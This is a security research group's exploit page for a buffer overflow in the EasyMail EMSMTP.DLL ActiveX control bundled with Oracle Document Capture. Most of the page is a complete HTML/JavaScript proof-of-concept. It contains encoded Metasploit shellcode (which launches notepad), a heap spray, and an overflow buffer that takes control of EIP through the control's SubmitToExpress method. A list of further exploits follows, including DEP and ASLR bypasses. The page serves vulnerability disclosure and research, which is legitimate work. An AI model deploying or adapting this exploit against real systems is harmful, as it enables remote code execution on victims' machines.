Services Vulnerabilities Exploits Publications News Blog About DSecRG


[13] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF

This is the exploit for QuikSoft EasyMail ActiveX emsmtp.dll (v. 6.0.1)
This DLL used is in :
PostCast PostCast Server Pro 3.0.61
Oracle Document Capture 10.1.3.5

Exploit uses HeapSpray and
CALL [ESI+CC] instruction in emsmtp.dll code for taking control over EIP

# Title: EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control BOF (CALL from code)
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published: 2009-11-12
# Verified: yes
# Download Exploit Code
# Download Vulnerable app


<HTML>
<HEAD>
<TITLE>"EMSMTP.DLL": ActiveX CALL Sploit</TITLE>
</HEAD>
<BODY>

<OBJECT id='vuln' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></object>
<!--by Alexey Sintsov from DSecRG [www.dsecrg.com]-->
<!---this sploit use CALL [ESI+CC] into vuln code->
<!--original advisory: http://security-assessment.com/files/advisories/easymail_advisory.pdf -->
<!--rgod is credited with the discovery of this issue.-->
<SCRIPT>

function Exploit(){

//Metasploit - exec notepad
var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u6ed5%u746f%u7065%u6461%u0000");

var mem=new Array();
var i=0;

//Simple heap-spray
var bigbk=unescape("%u0d0d%u0d0d%u0d0d%u0d0d");
while(bigbk.length<0x40000) bigbk=bigbk+bigbk;
bigbk=bigbk+unescape("%u9090%u9090%u9090%u9090"); //PAD's
for(; i<400;i++) mem[i]=bigbk+shell;

var bf=unescape("%63");
var buf="";
while (buf.length<260) buf=buf+bf;

//CALL [0x0D0D0C41+CC] than
//EIP = 0x0d0d0d0d

buf+=unescape("%0D%0D%0D%0D"); //ESI – on shellcode from heap
buf+="FFFF"+unescape("%61%61%61%61");// RET = 0x61616161 - doesn't matter
buf+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF";
buf+=unescape("%62%62%62%62");//SEH handler = 0x62626262 - doesn't matter

vuln.SubmitToExpress(buf);
}
Exploit();
</SCRIPT>
</BODY></HTML>
Exploits RSS RSS
03.05.2010
[17] ProSSHD v 1.2. Remote bind shell exploit (w/ASLR and DEP bypass using ROP)

05.03.2010
[16] SAP GUI 7.10 WebViewer3D ActiveX - JIT-Spray Exploit
05.03.2010
[15] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - JIT-Spray Exploit
15.02.2010
[14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass
15.02.2010
[13] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF
18.02.2009
[12] Oracle Database SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger (metasploit module)
Exploits list


© 2002—2010, Digital Security
For quoting or using materials from this site
link is obligatory

+7 (812) 703-1547, +7 (812) 430-9130    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search